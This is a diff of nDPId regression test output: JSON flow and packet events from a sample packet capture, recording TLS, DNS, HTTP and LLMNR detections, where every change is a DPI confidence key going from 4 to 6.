00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414296,"pkt":"ABAj4ACgYMVHBbyMCABFAABAzwZAAEAGcgXAqAUQwKhzS9F6Abs0INrqAAAAALAC\/\/+nvgAAAgQFtAEDAwUBAQgKGg+ZQgAAAAAEAgAA"} 01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":759,"pkt_l4_len":725,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAALpkqNAAEAGaYLAqAUQHw1XJNFMAbv8UnEzBJ2iMIAYEABq4wAAAQEIChoPmUJf7iUmFwMDArD5LAelFwFlufuyco4s\/\/Qvv+UsF7KG3W2aXVv9903LV87nxtNAIzAtPlUtxAIPT+QYQYOyjbvxtQ+Q3w2BeXCdTeBc2Vvhlyi2kFxwf1jLqB8jaDJwivP\/xGW9s5xZd+K0vcco68WAGVVhFXALDf8rp7nos7l2c3eCb9+ciqE2R8G8Pf4MZ5pCC83zl7gfBWwkh4JHUeVVNouVvCgmUz7pPOU27GiOZYmbf0iAqd6+kgzDqsVjJGMyvKT\/fOgiH+fRlxhK8fgLFTMvUw6JGt\/UsaYL4RE69L+mCP1NuNnyVxeorLPVKIVZ13X2miaLYk2DWr9BibPpp3QKFrWmy8E3NKq4Ls+dcN8upVmfmDj7xZcV58HYFhdLrgO56pzKogay7LJ\/Pef6DyPMYVTwySpdKas1Aq+IzlVKtxcR8k6I3pw5YMLWtutrLSrH5ABSNgfMJjpr7KO2g8MPyxfJHjp2vDiI+ruSCa4CqxUVcHS+ZRTOUS6b9R2wmUCu6Y6KCOkMK6zLaxdsVh2SuDnapzRD7fveixQuUMvdOAMX7X4K41IkMkOElwsydkORTyAInVQi4oBSOBugr0DMtesGCV044xeQCLnW8sd4RkMZjJZ4QhcfoxPlJX+f43AY0PNflsTA9yNhamZf4IabRxMggb\/lds0+jUTPyPfEWIc3bobDla0SyHhLFLXgk1Ee+Oe4AxYayqQxnLn\/4p\/VoNfV4WOaHdYeCMPZ3SK54BPrr3dXSTfyhV2DUhdJ\/67K7IkFW2cC4kKBJWWCDD28cyiCT6LF9mykZ0ExSXEgjBCLfnxWyJ4aekEg78E+rUf7kdSBDRTW3tDoKcMJPCumkIQ5L3nUbGzQ3I0QnDhkpOFdM4JoimsOVpik4zef5xLCds4Ul8v94jeMaHT0fOcIvOZn5GhO"} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1470104414395,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1470104414395,"pkt":"TF4M6gNlYMVHBbyMCABFAABL64oAAP8RYP7AqAUQqF8BAfeMADUAN6RcbYwBAAABAAAAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAE="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00770{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1470104414402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1470104414402,"pkt":"ABxCjnAxTF4M6gNlCABFAAET0UQAAPgRgXyoXwEBwKgFEAA194wA\/yfZbYyBgAABAAYAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAHADAAFAAEAAUxDAC0GZGwtb2JzCG9mZmljaWFsBGxpbmUFbmF2ZXICanAJZWRnZXN1aXRlA25ldADAOwAFAAEAAACwADUKY2FjLWRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwCWxpbmUtemVybwZha2FkbnPAY8B0AAUAAQAAAQAAEgVhMTg2NwJnMgZha2FtYWnAY8C1AAEAAQAAAAUABMtFUUnAtQABAAEAAAAFAATLRVFCwLUAAQABAAAABQAEPdw+2g=="} 
-00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -463,295 +463,295 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"} 
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} 
+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416855,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2UAAAERi4vAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416855,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxAAAAERB\/nAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1470104416958,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416958,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2cAAAERi4nAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1470104416959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416959,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxIAAAERB\/fAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 